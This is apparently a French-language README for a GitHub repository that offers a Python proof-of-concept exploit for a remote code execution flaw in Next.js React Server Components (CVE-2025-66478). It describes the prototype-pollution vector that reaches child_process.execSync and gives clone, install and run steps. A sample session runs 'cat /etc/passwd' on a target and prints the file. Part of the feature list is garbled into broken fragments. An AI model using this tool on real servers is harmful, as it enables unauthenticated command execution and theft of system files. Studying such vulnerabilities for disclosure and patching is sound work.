
React2Shell (CVE-2025-66478): Une preuve de concept basée sur Python pour l'exécution critique de code à distance (RCE) dans les composants serveur Next.js. Propose une CLI interactive, une injection de payload personnalisée et un formatage de sortie plus clair. Uniquement à des fins de recherche éducative.
Next.js : Exécution de code à distance (RCE) via pollution de prototypes dans les composants serveur
Ce dépôt contient une Preuve de Concept (PoC) pour CVE-2025-66478 (également référencée sous CVE-2025-55182 dans certains contextes), une vulnérabilité critique affectant les applications Next.js utilisant certaines versions des composants serveur React (RSC).
En manipulant le processus de sérialisation des RSC, un attaquant non authentifié peut injecter une charge utile malveillante via pollution de prototypes (__proto__:then). Cela peut conduire à l'exécution de commandes système arbitraires sur le serveur via child_process.execSync.
Développé par : ArkhamKnight47
multipart/form-data requise.1:E{"digest":...}).\n vs \r\n) pour une sortie propre sur cibles Windows et Linux.requests# Cloner le dépôt
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Installer les dépendances
pip install requests
python CVE-2025-66478.py
Vous serez invité à fournir :
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
Cet outil est fourni à des fins éducatives et de recherche en sécurité uniquement.
L'auteur (ArkhamKnight47) décline toute responsabilité en cas d'utilisation abusive de ce code. Tester cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégal et contraire à l'éthique.
Utilisez de manière responsable. Apprenez de manière éthique. Sécurisez votre pile.